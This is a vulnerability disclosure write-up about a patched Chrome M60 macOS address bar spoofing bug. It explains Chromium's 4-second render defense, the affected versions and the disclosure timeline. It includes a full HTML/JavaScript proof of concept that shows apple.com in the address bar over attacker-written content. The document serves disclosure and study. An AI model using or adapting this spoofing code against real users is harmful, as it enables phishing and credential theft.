September 14, 2018

Chrome M60 address bar spoofing

Description

There was an address bar spoofing vulnerability in the Chrome browser which allowed an attacker to trick a user into visiting a spoofed website that appears to be legitimate.

Recently, the Chromium team added a defense that gives the new page (apple.com in this case) 4 seconds to render after its URL appears in the omnibox, which resolves this class of spoofing problem in general. If the 4-second timer expires, the display goes all white.

So unfortunately, this PoC does not work in release M61, and the Chromium team closed this report on Aug 2.
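As an added illustration (not code from the original report or from Chromium), the following is a deterministic model of the omnibox defense described above: a navigation shows its URL at once, and if the page has not rendered within the grace period the content area is blanked. The class and function names and the 4000 ms constant are assumptions made for the model, not Chromium's implementation.

```javascript
// Model of the render-grace-period defense (assumed names; not Chromium's code).
const RENDER_GRACE_MS = 4000;
class OmniboxModel {
  constructor() {
    this.url = 'about:blank';  // URL shown in the address bar
    this.content = '';         // what the content area displays
    this.pendingSince = null;  // start time of the pending navigation, or null once committed
  }
  // A navigation shows the target URL immediately, before any bytes arrive.
  navigate(url, now) {
    this.url = url;
    this.content = '';
    this.pendingSince = now;
  }
  // document.write() from the opener into the still-pending initial document.
  write(html) {
    this.content = html;
  }
  // The real response arrives and renders: the navigation is committed.
  commit(html) {
    this.content = html;
    this.pendingSince = null;
  }
  // Enforce the grace period: if the navigation is still pending when it
  // expires, blank the content so nothing is displayed next to an unearned URL.
  tick(now) {
    if (this.pendingSince !== null && now - this.pendingSince >= RENDER_GRACE_MS) {
      this.content = '';
    }
    return { url: this.url, content: this.content };
  }
}

// Replay the PoC's sequence: navigate to a URL that never responds, inject
// content, then ask what the user sees after elapsedMs milliseconds.
function replayPoc(elapsedMs) {
  const m = new OmniboxModel();
  m.navigate('https://www.apple.com:82', 0);
  m.write('<h1>Spoofing by Wester!</h1>');
  return m.tick(elapsedMs);
}

// A legitimate page that responds within the grace period is unaffected.
function replayLegitimate(elapsedMs) {
  const m = new OmniboxModel();
  m.navigate('https://www.apple.com', 0);
  m.commit('<h1>Real apple.com</h1>');
  return m.tick(elapsedMs);
}
```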

Affected version

Chrome version < 61.0.3163.79 on the macOS platform

The PoC

<body>
<a id="test" href="javascript:window.open('https://www.apple.com','aaa')" onclick="spoof()">Apple.com</a>
</body>

<script>
var a;   // the window opened under the name "aaa"
var b;   // handle of the polling interval

function spoof() {
    // Open the named window on port 82: the omnibox shows the apple.com URL
    // right away, but the request stalls, so the initial document stays writable.
    a = window.open("https://www.apple.com:82", "aaa");

    // Inject the spoofed content into the still-pending document.
    a.document.write("<h1>Spoofing by Wester!</h1>");
    slow();
    b = setInterval(core, 1);

    // Give up polling after 10 seconds.
    setTimeout(function () {
        clearInterval(b);
    }, 10000);
}

// Keep the opener busy by adding hidden iframes that load google.com.
function slow() {
    var i, iframe;
    for (i = 0; i < 10; i++) {
        iframe = document.createElement("iframe");
        iframe.src = 'https://www.google.com';
        iframe.style = 'display:none';
        document.body.appendChild(iframe);
    }
}

// Poll the opened window: reading its location throws once the window is
// no longer same-origin with the opener (the comparison result itself is unused).
function core() {
    try {
        a.location.href !== 'about:blank';
    }
    catch (e) {
        // stop page loading
        a.location.href = 'https://www.google.com/csi';
    }
}
</script>

Timeline

- Reported to Chromium on Jul 31

- Report was closed by Chromium on Aug 2

- Publicly disclosed on Dec 6